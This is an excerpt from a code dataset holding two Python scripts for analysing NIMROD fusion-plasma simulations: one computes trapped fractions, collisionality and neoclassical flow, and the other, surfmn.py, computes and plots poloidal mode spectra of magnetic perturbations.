100\n lam, weights = numpy.polynomial.legendre.leggauss(nlam)\n bave = numpy.sqrt(yvars[5,ii]) # sqrt(<B^2>)\n lam += 1\n lam *= bave/(2.0*bextrema[1,ii])\n weights *= bave/(2.0*bextrema[1,ii])\n rzp = [contours[0,0,ii], contours[1,0,ii], 0]\n intgr, contour = FSA(eval_nimrod, rzo, trapfsa, 2*nlam+2, nsurf=1, depvar='eta', rzp=rzp)\n f_pass[0,ii] = 0.75*numpy.sum(weights*lam/intgr[0:nlam])\n f_pass[1,ii] = 0.75*numpy.sum(weights*lam*intgr[nlam:2*nlam])\n f_pass[2,ii] = 0.75*numpy.sum(weights*lam/numpy.sqrt(1.0-lam*intgr[2*nlam]))\n eps[ii] = intgr[2*nlam+1]/rzo[0]\n f_pass[3,ii] = 1 + (-1.46 + 0.46*eps[ii])*numpy.sqrt(eps[ii])\n print(ii,dvar[1,ii],f_pass[:,ii])\n trapArr = [f_pass,eps]\n numpy.savez(trapfilename,*trapArr)\nf_trap = 1.0 - f_pass[:,:]\n\n#%#import IPython; IPython.embed()\n\n# set fields as views to the arrays\nne = yvars[0,:iend]\nnd = yvars[1,:iend]\n#nc = yvars[2,:iend]\nti = yvars[3,:iend]\nte = yvars[4,:iend]\nfsabsq = yvars[5,:iend]\nfsabdgrBsq = yvars[6,:iend]\nrbphi = yvars[7,:iend]\nomega = yvars[8,:iend]\nkpol = yvars[9,:iend]\nrhon = dvar[1,:iend]\npsi = dvar[2,:iend]\npsix = dvar[2,-1]\nq = numpy.fabs(dvar[7,:iend])\nbigr = bigr[:iend]\n#%\npn.plot_scalar_line(None, psi, flabel=r'\\psi',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper left')\n#%\n# Plot trapped fraction\npn.plot_scalar_line(None, f_trap[0,:], flabel=r'f_t',\n f2=f_trap[1,:], f2label=r'f_{tl}',\n f3=f_trap[2,:], f3label=r'f_{tu}',\n f4=f_trap[3,:], f4label=r'f_{t\\epsilon}',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',\n style='varied',legend_loc='upper left')\n\n# Plot fsa quants\npn.plot_scalar_line(None, fsabsq, flabel=r'\\langle B^2 \\rangle',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper left')\npn.plot_scalar_line(None, fsabdgrBsq, flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper right')\nfsa_approx = eps**2/(2*rzo[0]**2*q**2)\npn.plot_scalar_line(None, fsabdgrBsq/fsabsq,\n 
flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle/\\langle B^2 \\rangle',\n f2=fsa_approx, f2label='\\epsilon^2/(2 R_0^2 q^2)',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='m^{-2}',legend_loc='upper right')\n\n#%# computed quantities\n#%### nustar ###\n#%\nnc=0\nzc=0\n\nlnLambda=24.-numpy.log(numpy.sqrt(ne/10**6)/te)\nsqrt2 = numpy.sqrt(2)\ncoef = 4.0 * numpy.sqrt(numpy.pi) * echrg**4 * lnLambda \\\n /((4.0 * numpy.pi * eps0)**2 * kb**1.5 * 3.0 * numpy.sqrt(md))\nnui = coef*(nd+sqrt2*nc*zc**2)*lnLambda / numpy.sqrt(ti**3) # A14\nvti = numpy.sqrt(ti*kb/md)\nlambdai = vti/nui # A15\nzstar = nc*zc**2 / nd # A13\ncoef = 5*(1+sqrt2*zstar)/(sqrt2*12.0)*((17.0*zstar/4.0)+205.0/(48.0*sqrt2)) \\\n /(2*zstar**2 + 301*zstar/(48.0*sqrt2)+89/48)\netai00 = md*nd*nui*lambdai**2 # A17\n\n# plot parallel viscosity as a diffusivity\npn.plot_scalar_line(None, etai00/(md*nd), flabel=r'\\eta^i_{00}/(m_d n_d)',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='m^2/s', legend_loc='upper right')\n\nomegati = vti/(rzo[0]*q) # B10\nnustari = f_trap[0,:]/(2.92*f_pass[0,:]) * nui*omegati/vti**2 * fsabsq/fsabdgrBsq # B11\nnustari_aprx = nui*rzo[0]*q/(eps**(1.5)*vti) #\n#%\npn.plot_scalar_line(None, eps, flabel=r'\\epsilon',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper right')\n\n# plot nustar\npn.plot_scalar_line(None, nustari, flabel=r'\\nu_*',\n f2=nustari_aprx, f2label=r'R_0 q \\nu_i / \\epsilon^{3/2} v_{Ti}',\n f3=eps**(-1.5), f3label=r'\\epsilon^{-3/2}',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',\n style='varied',legend_loc='upper right')\n#%\n#%### IOL quants ###\n#%\n#%# Compute the electric potential\n#%def int_enorm(delta, rzst, norm):\n#% '''\n#% Integrand for E normal to compute electric potential.\n#% '''\n#% rz = rzst + norm*delta\n#% e = eval_nimrod.eval_field('e', rz, dmode=0, eq=2)\n#% return numpy.dot(e[0:3],norm)\n#%norm = numpy.array([contours[0,0,iend]-contours[0,0,0],\n#% contours[1,0,iend]-contours[1,0,0],0.0])\n#%norm = norm/numpy.linalg.norm(norm)\n#%pot = numpy.zeros([iend])\n#%delta0 = 0.0\n#%rzst = rzo\n#%for ii in range(iend):\n#% rzp = numpy.array([contours[0,0,ii],contours[1,0,ii],0.0])\n#% delta1 = numpy.linalg.norm(rzst-rzp)\n#% pot[ii], err = quad(int_enorm, delta0, delta1, args=(rzst, norm))\n#% #print(rzp,delta1,pot[ii],err)\n#% delta0 = delta1\n#%pot = numpy.cumsum(pot)\n#%# plot the potential\n#%#pn.plot_scalar_line(None, pot, flabel=r'\\Phi',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='V',legend_loc='upper left')\n#%# Make a spline vs psi\n#%splpot = UnivariateSpline(numpy.fabs(psi), pot, k=4, s=0)\n#%d2pot = splpot.derivative(n=2)(numpy.fabs(psi))\n#%#pn.plot_scalar_line(None, d2pot, flabel=r'\\Phi^{\\prime \\prime}',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='V/T^2m^4',legend_loc='upper left')\n#%\n#%fval = eval_nimrod.eval_field('b', rzo, dmode=0, eq=2)\n#%B0 = Vector(fval, rzo, torgeom=gmt, dmod=0)\n#%omega0 = echrg*B0.mag().data/md\n#%S = 1.0 + (rbphi/omega0)**2 * (echrg*d2pot/md)\n#%#pn.plot_scalar_line(None, S, flabel=r'S',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='lower left')\n#%omegai = echrg*bextrema[0,:iend]/md\n#%term1 = nustari**0.25\n#%term2 = omegai*numpy.sqrt(S)/(rbphi*vti*numpy.sqrt(2.0*eps))*numpy.fabs(psi-psix)\n#%#pn.plot_scalar_line(None, term1, flabel=r'\\nu_*^{1/4}',\n#%# f2=term2, f2label=r'\\Omega_i \\sqrt{|S|} |\\psi - \\psi_x| / F v_{Ti} \\sqrt{2\\epsilon}',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='',\n#%# legend_loc='upper right')\n#%dndtorb = -2.25*nd*nui/numpy.sqrt(numpy.pi*2.0*S*eps) \\\n#% *numpy.exp(-(term1+term2)**2.0)\n#%S0 
= 1.0\n#%term02 = omegai*numpy.sqrt(S0)/(rbphi*vti*numpy.sqrt(2.0*eps))*numpy.fabs(psi-psix)\n#%dndtorb0 = -2.25*nd*nui/numpy.sqrt(numpy.pi*2.0*S0*eps) \\\n#% *numpy.exp(-(term1+term2)**2.0)\n#%#pn.plot_scalar_line(None, dndtorb, flabel=r'\\langle\\partial n / \\partial t\\rangle_{orb}',\n#%# f2=dndtorb0, f2label=r'\\langle\\partial n / \\partial t\\rangle_{orb} E=0',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='m^{-3} s^{-1}',\n#%# legend_loc='lower left')\n#%\n#%dr=0.01 # 1cm estimated\n#%jorbBtor = echrg*dr*dndtorb*rbphi/bigr # estimate, be more careful with BPhi\n#%#pn.plot_scalar_line(None, jorbBtor, flabel=r'e \\Gamma_{orb} B_{\\Phi}',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='N m^{-3}',\n#%# legend_loc='lower left')\n#%\n\n### NC poloidal flow ###\n\nD = 6.0/5.0 * (2.0*zstar**2+301.0*zstar/(sqrt2*48.0)+89.0/48.0)\nnuitauii = 1.0/sqrt2 + zstar\ntauii = nuitauii/nui\nK00iB = (zstar + sqrt2-numpy.log(1+sqrt2))/nuitauii\nK01iB = (zstar + 1.0/sqrt2)/nuitauii # isn't this just 1?\nK11iB = (2.0*zstar + 9.0/(4.0*sqrt2))/nuitauii\nK00iP = numpy.sqrt(numpy.pi)\nK01iP = 3 * numpy.sqrt(numpy.pi)\nK11iP = 12 * numpy.sqrt(numpy.pi)\nK00iPS = (17.0*zstar/4.0 + 205.0/(sqrt2*48.0))/D\nK01iPS = (7.0/2.0)*(23.0*zstar/4.0 + 241.0/(sqrt2*48.0))/D\nK11iPS = (49.0/4.0)*(33.0*zstar/4.0 + 325.0/(sqrt2*48.0))/D\nK00itot = K00iB/(1.0 + numpy.sqrt(nustari) + 2.92*nustari*K00iB/K00iP) \\\n /(1.0 + 2.0*K00iP/(3.0*omegati*tauii*K00iPS))\nK01itot = K01iB/(1.0 + numpy.sqrt(nustari) + 2.92*nustari*K01iB/K01iP) \\\n /(1.0 + 2.0*K01iP/(3.0*omegati*tauii*K01iPS))\nK11itot = K11iB/(1.0 + numpy.sqrt(nustari) + 2.92*nustari*K11iB/K11iP) \\\n /(1.0 + 2.0*K11iP/(3.0*omegati*tauii*K11iPS))\nmuiratio = 5.0/2.0 - K01itot/K00itot\nmui00 = K00itot\nmui01 = 5.0/2.0*K00itot - K01itot\nmui11 = K11itot - 5.0*K01itot + 25.0/4.0*K00itot\nnui11 = sqrt2 # lots of assumptions here\ncsharp = 1.0/(1.0+mui11-mui01*muiratio)/nui11\nsplti = UnivariateSpline(rhon, ti, k=4, s=0)\nsplpsi = UnivariateSpline(rhon, psi, k=4, s=0)\ndtidpsi = splti.derivative(n=1)(rhon)/splpsi.derivative(n=1)(rhon)\npn.plot_scalar_line(None, dtidpsi, flabel=r'\\partial T_i / \\partial \\psi',\n xvar=rhon, xlabel=r'\\rho_N', ylabel=r'eV/Tm^2',\n legend_loc='upper left')\nU0itheta = -csharp*muiratio*rbphi/(echrg*fsabsq)*kboltz*dtidpsi\n\n#%slicefileName='../../haskey/slice_164988.3525'\n#%rfile = readRaw(slicefileName)\n#%fitfileName='../../haskey/fit_164988.3525'\n#%ffile = pfileReader.pfileReader(fitfileName)\n#%vpolcfit = ffile.getPfileData('V_pol_12C6_FIT(m/s)')\n#%vpolcdat = rfile['V_pol_12C6_SLICE(m/s)']\n#%splvpfit = UnivariateSpline(vpolcfit[0], vpolcfit[1], k=4, s=0)\n#%v0ipol = numpy.zeros(iend)\n#%Uitheta = numpy.zeros(iend)\n#%fsaNCforce = numpy.zeros(iend)\n#%for ii in range(iend):\n#% rz = numpy.array([bigr[ii], 0, 0])\n#% bf = eval_nimrod.eval_field('b', rz, dmode=1, eq=2)\n#% v0ipol[ii] = bf[1]*U0itheta[ii]\n#% B = Vector(bf, rzo, torgeom=gmt, dmod=1)\n#% bgrB = B.hat(dmod=0).dot(grad(B.mag()))\n#% Uitheta[ii] = splvpfit(rhon[ii])/bf[1]\n#% fsaNCforce[ii] = md*nd[ii]*mui00[ii]*(fsabsq[ii]/fsabdgrBsq[ii])*(bgrB.data)**2*(Uitheta[ii]-U0itheta[ii])\n#%#pn.plot_scalar_line(None, U0itheta, flabel=r'U^0_{i\\theta}',\n#%# #f2=Uitheta, f2label=r'U_{i\\theta}\\;C6\\;CER\\;fit',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel=r'm/sT',\n#%# legend_loc='upper left')\n#%#fig_size = [12,6.75]\n#%#fig, ax = pl.subplots(figsize=fig_size)\n#%#ax.errorbar(vpolcdat[0],vpolcdat[1],yerr=vpolcdat[2],fmt='x',color='b', label='C6 CER 
measurements')\n#%#ax.plot(vpolcfit[0],vpolcfit[1],color='r',label='C6 CER fit')\n#%#pn.plot_scalar_line(None, v0ipol, flabel=r'U^0_{i\\theta} B_p\\;(Z=0)',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel=r'm/s',\n#%# legend_loc='lower left', ax=ax)\n#%pn.plot_scalar_line(None, fsaNCforce,\n#% flabel=r'm_i n_i \\mu_i \\langle B^2_0 \\rangle (U_{i\\theta} - U_{i\\theta}^0)',\n#% xvar=rhon, xlabel=r'\\rho_N', ylabel=r'N m^{-3}',\n#% legend_loc='upper right')\n#%\n\n\n# Setup FSA quants spline as function of rhon\n#zvars = numpy.zeros((2, )+yvars.shape) # psin,q + yvars\n#zvars[0,:] = dvar[0,:] # psin\n#zvars[1,:] = dvar[7,:] # q\n#zvars[2:,:] = yvars[:,:]\n#splrho = interp1d(rhon, zvars, kind='cubic')\n\n#pn.plot_scalar_line(None, yvars[0,:], flabel=r'p', xvar=dvar[1,:], ylabel=r'pressure (Pa)', xlabel=r'\\rho_N', legend_loc='upper right')\n#pn.plot_scalar_line(None, yvars[1,:], flabel=r'n', xvar=dvar[1,:], ylabel=r'density (m^{-3})', xlabel=r'\\rho_N', legend_loc='upper right')\n\n##2D plots -- forces\n#xres=250; yres=250 # need y=1000\n#grid = pn.grid_2d_gen([1.14, -1.19, 0], [1.14, 1.02, 0], [2.31, -1.19, 0], xres, yres)\n#\n#maskfilename = 'mask'+str(xres)+'x'+str(yres)+'.npy'\n#if os.path.exists(maskfilename):\n# mask = numpy.load(maskfilename)\n#else:\n# mask = numpy.zeros((1,grid.shape[1],grid.shape[2]))\n# for ix in range(grid.shape[1]):\n# for iy in range(grid.shape[2]):\n# if contourContains(Rsep,Zsep,grid[0,ix,iy],grid[1,ix,iy]):\n# mask[0,ix,iy] = 1.0\n# else:\n# mask[0,ix,iy] = numpy.nan\n# numpy.save(maskfilename,mask)\n#\n##fval = eval_nimrod.eval_field('ti', grid, dmode=0, eq=2)\n##ti = Scalar(fval, grid, torgeom=gmt, dmod=0)\n##fval = eval_nimrod.eval_field('n', grid, dmode=1, eq=2)\n##ne = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=0)\n##nd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\n##nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n#fval = eval_nimrod.eval_field('v', grid, dmode=2, eq=2)\n#v = Vector(fval, grid, torgeom=gmt, dmod=2)\n#fval = eval_nimrod.eval_field('b', grid, dmode=1, eq=2)\n#B = Vector(fval, grid, torgeom=gmt, dmod=1)\n#\n#divv = 2.0/3.0 * div(v)\n#pn.plot_scalar_plane(grid, mask[0]*divv.data, ax=setBdryPlot())\n#BdcvcB = B.dot( curl( v.cross(B) ) ) / B.dot(B)\n#pn.plot_scalar_plane(grid, mask[0]*BdcvcB.data, ax=setBdryPlot())\n#PiParFast = BdcvcB + divv\n#pn.plot_scalar_plane(grid, mask[0]*PiParFast.data, ax=setBdryPlot(), fmin=-10000., fmax=10000.)\n\n# 1D force-balance test\ngrid = pn.grid_1d_gen([1.76821, -0.0188439, 0], [2.7, -0.0188439, 0], 1000)\nfval = eval_nimrod.eval_field('p', grid, dmode=2, eq=1)\np = Scalar(fval, grid, torgeom=gmt, dmod=2)\nfval = eval_nimrod.eval_field('b', grid, dmode=1, eq=1)\nB = Vector(fval, grid, torgeom=gmt, dmod=1)\nfval = eval_nimrod.eval_field('j', grid, dmode=1, eq=1)\nj = Vector(fval, grid, torgeom=gmt, dmod=1)\nfval = eval_nimrod.eval_field('v', grid, dmode=1, eq=1)\nv = Vector(fval, grid, torgeom=gmt, dmod=1)\nfval = eval_nimrod.eval_field('n', grid, dmode=1, eq=1)\nnd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\nfval = eval_nimrod.eval_field('ti', grid, dmode=1, eq=1)\nti = Scalar(fval, grid, torgeom=gmt, dmod=1)\n#nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n# computed quantities\njxb=j.cross(B)\ngrp=p.grad()\nmd=3.3435860e-27\nmc=1.9944235e-26\n#rhovdgrdv = (md*nd+mc*nc)*v.dot(grad(v))\nrhovdgrdv = (md*nd)*v.dot(grad(v))\n\nforce=jxb-grp\npn.plot_vector_line(grid, force.data, flabel=r'Force', f2=jxb.data,\n f2label=r'$J\\times B$',\n f3=grp.data, f3label=r'$\\nabla p$',\n 
f4=rhovdgrdv.data, f4label=r'$v\\cdot \\nabla v$',\n comp='perp', style='varied',\n legend_loc='lower left', ylabel=r'Force density N/m^3')\n\npn.plot_scalar_line(grid, ti.data, flabel=r'T_i', style='varied',\n legend_loc='lower left', ylabel=r'Temperature eV')\n" }, { "alpha_fraction": 0.5427481532096863, "alphanum_fraction": 0.5967708826065063, "avg_line_length": 30.98257064819336, "blob_id": "14b218a5981999f5060c43b5c0b6bfc596be63d7", "content_id": "429c4033a843423314e1e128965aaa0119fd87e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14679, "license_type": "no_license", "max_line_length": 145, "num_lines": 459, "path": "/surfmnNim/surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "import time\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom matplotlib import ticker\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport math\nfrom fieldIndex import files,R,Z,BRr,BRi,B0R,B0Z,B0T,qcon1,J0T,pd\nfrom fgProfs import rho,qg,irho2,irho3,irho4\n\n\nfgfile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/fgprofs.bin'\n\nmrange=10\n\nZ0=Z[files[0]][0,0]\nR0=R[files[0]][0,0]\n\nr_minor=np.sqrt((R[files[0]]-R0)**2+(Z[files[0]]-Z0)**2)\n\n#calculate length along poloidal extent of axisymmetric poloidal flux contour\ns=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\nds=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\nfor i in range(len(s[:,0])):\n for j in range(len(s[0,:])-1):\n ds[i,j]=math.sqrt((R[files[0]][i][j+1]-R[files[0]][i][j])**2+(Z[files[0]][i][j+1]-Z[files[0]][i][j])**2)\n s[i,j+1]=s[i,j]+ds[i,j]\n\n#calculate equilibrium poloidal field for [r,pol] locations\nB0P=np.sqrt((B0R[files[0]])**2+(B0Z[files[0]])**2)\nif J0T[files[0]][0,0]>0: B0P=-B0P\n\n\n\ndqds=(-B0T[files[0]])/(2*math.pi*B0P*R[files[0]]**2)\nq1=np.trapz(dqds,s,axis=1)\njac=q1[:,None]*R[files[0]]**3*B0P/(-B0T[files[0]]) \n\n#calculate straight-field line theta (PEST coordinate, Jim's derivation)\ntheta_str=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\ndtheta_str=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\nfor i in range(len(theta_str[:,0])):\n for j in range(len(theta_str[0,:])-1):\n theta_str[i,j+1]=theta_str[i,j]+1./(q1[i]+1.0e-11)*(ds[i,j]*(-B0T[files[0]][i,j])/(B0P[i,j]*R[files[0]][i,j]**2))\n dtheta_str[i,j]=1./(q1[i]+1.0e-11)*(ds[i,j]*(-B0T[files[0]][i,j])/(B0P[i,j]*R[files[0]][i,j]**2))\n for j in range(len(theta_str[0,:])):\n theta_str[i,j]=theta_str[i,j]-theta_str[i,pd[files[0]]]\n\n\ndFSAAdth=2*math.pi*jac\nFSArea=np.trapz(dFSAAdth,theta_str,axis=1)\n\ndrhodth=2*math.pi*jac*r_minor/(FSArea[:,None]+1.0e-11)\nrho1=np.trapz(drhodth,theta_str,axis=1)\n\nrholcfs=rho1[int(len(rho1)*.75)] \n \nfor i in range(len(rho1)):\n rho1[i]=rho1[i]/rholcfs\n\nfor i in range(len(q1)):\n mid2=(q1[i]+2.)*(q1[i+1]+2.)\n if mid2<0:\n irho12=i\n mid3=(q1[i]+3.)*(q1[i+1]+3.)\n if mid3<0:\n irho13=i\n mid4=(q1[i]+4.)*(q1[i+1]+4.)\n if mid4<0:\n irho14=i\n mid5=(q1[i]+5.)*(q1[i+1]+5.)\n if mid5<0:\n irho15=i\n mid6=(q1[i]+6.)*(q1[i+1]+6.)\n if mid6<0:\n irho16=i\n mid10=(q1[i]+10.)*(q1[i+1]+10.)\n if mid10<0:\n irho110=i\n break\n\n\nmmax=mrange\nmmin=-mrange\nm=np.linspace(mmin,mmax,mmax-mmin+1)\n\nbcnm=np.zeros((len(files),(mmax-mmin+1),len(R[files[0]])))\nbsnm=np.zeros((len(files),(mmax-mmin+1),len(R[files[0]])))\n\nfor l in range(len(bcnm)):\n if files[l]=='xy_slice00.bin':\n multfact=1/5.e-5\n else:\n multfact=1\n for k in range(len(bcnm[0])):\n 
dbcnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*multfact*(BRr[files[l]]*np.cos((mmin+k)*theta_str)-BRi[files[l]]*np.sin((mmin+k)*theta_str))\n dbsnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*multfact*(-BRr[files[l]]*np.sin((mmin+k)*theta_str)-BRi[files[l]]*np.cos((mmin+k)*theta_str))\n \n bcnm[l,k]=np.trapz(dbcnmdth,theta_str,axis=1)\n bsnm[l,k]=np.trapz(dbsnmdth,theta_str,axis=1)\n\nbnm=np.sqrt(bcnm**2+bsnm**2)\n#\n\n#plot choices\n\nplotqcon=0\nplotqlin=0\nplotjac=0\nplottheta=0\nplotqcompare=0\nplotFSArea=0\nplotsurf=0\nplotsurf2wall=0\nplotmag=0\nplotmag2wall=0\n\nxyfile=5\n\n#plotting routines\n\nclines=301 #levels of filled contours\nibmax=len(rho[fgfile])+1\n\nif plotqlin==1:\n \n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(R[files[0]][:,4],q1,color='r',label='surfmn',lw=3)\n ax.plot(R[files[0]][:,4],qcon1[:,4],color='b',label='Fluxgrid',lw=3) \n\n ax.legend(loc=3,fontsize=20)\n\n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$R\\,({\\rm m})$',fontsize=24)\n ax.set_ylabel(r'$q$',fontsize=24)\n \n plt.savefig('q.png',bbox_inches='tight')\n\nif plotmag2wall==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho1,bnm[xyfile,9,:].real,color='m',label='m=-1',lw=3)\n ax.plot(rho1,bnm[xyfile,8,:].real,color='r',label='m=-2',lw=3)\n ax.plot(rho1,bnm[xyfile,7,:].real,color='b',label='m=-3',lw=3)\n ax.plot(rho1,bnm[xyfile,6,:].real,color='g',label='m=-4',lw=3)\n ax.plot(rho1,bnm[xyfile,5,:].real,color='y',label='m=-5',lw=3)\n ax.plot(rho1,bnm[xyfile,4,:].real,color='lime',label='m=-6',lw=3)\n ax.plot(rho1,bnm[xyfile,11,:].real,color='cyan',label='m=1',lw=3)\n ax.axvline(x=rho1[irho12],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n ax.axvline(x=rho1[irho13],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n ax.axvline(x=rho1[irho14],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n ax.axvline(x=rho1[irho15],lw=3,ls=(0,(3,2)),c='y',label=r'$q=-5$')\n ax.axvline(x=rho1[irho16],lw=3,ls=(0,(3,2)),c='lime',label=r'$q=-5$')\n \n ax.legend(loc=1,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# ax.set_xlim([.1,1]) \n\n# ax.set_ylim([0,4e-3]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$<r_m>$',fontsize=24)\n ax.set_ylabel(r'$B_m$',fontsize=24)\n \n plt.savefig('Bm2wall16.png',bbox_inches='tight')\n\n\nif plotmag==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho[fgfile],bnm[xyfile,9,1:ibmax].real,color='m',label='m=-1',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,8,1:ibmax].real,color='r',label='m=-2',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,7,1:ibmax].real,color='b',label='m=-3',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,6,1:ibmax].real,color='g',label='m=-4',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,11,1:ibmax].real,color='cyan',label='m=1',lw=3)\n ax.axvline(x=rho[fgfile][irho2],lw=3,ls=(0,(3,2)),c='r',label=r'$q=2$')\n ax.axvline(x=rho[fgfile][irho3],lw=3,ls=(0,(3,2)),c='b',label=r'$q=3$')\n ax.axvline(x=rho[fgfile][irho4],lw=3,ls=(0,(3,2)),c='g',label=r'$q=4$')\n \n ax.legend(loc=1,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# ax.set_xlim([.1,1]) \n\n# ax.set_ylim([0,4e-3]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), 
fontsize=22)\n \n ax.set_xlabel(r'$\\rho$',fontsize=24)\n ax.set_ylabel(r'$B_m$',fontsize=24)\n \n plt.savefig('Bm16.png',bbox_inches='tight')\n\nif plotsurf2wall==1:\n bmmax=np.amax(bnm[xyfile,:,1:])\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n# bmmax=0.002792068 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = ax.contourf(m,rho1[1:],np.rot90(bnm[xyfile,:,1:],k=-1),levels,cmap=cm.nipy_spectral)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_m$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(q1[1:irho110],rho1[1:irho110],c='white',lw=5,ls=(0,(10,2)),label=r'$m=qn$')\n \n ax.axhline(y=rho1[irho12],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n ax.axhline(y=rho1[irho13],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n ax.axhline(y=rho1[irho14],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n ax.axhline(y=rho1[irho15],lw=3,ls=(0,(3,2)),c='y',label=r'$q=-5$')\n ax.axhline(y=rho1[irho16],lw=3,ls=(0,(3,2)),c='lime',label=r'$q=-6$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$<r_m>$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n \n ax.set_ylim([.1,1.45]) \n \n #plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n plt.savefig('surfmn2wall00.png',bbox_inches='tight')\n\nif plotsurf==1:\n bmmax=np.amax(bnm[xyfile,:,1:])\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n bmmax=0.00278744622 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = ax.contourf(m,rho[fgfile],bnm[xyfile,:,1:ibmax],levels,cmap=cm.nipy_spectral)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_m$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(q1[:479],rho[fgfile],c='white',lw=5,ls=(0,(10,2)),label=r'$m=qn$')\n \n ax.axhline(y=rho[fgfile][irho2],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n ax.axhline(y=rho[fgfile][irho3],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n ax.axhline(y=rho[fgfile][irho4],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$\\rho$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n \n ax.set_ylim([.1,.99]) \n \n 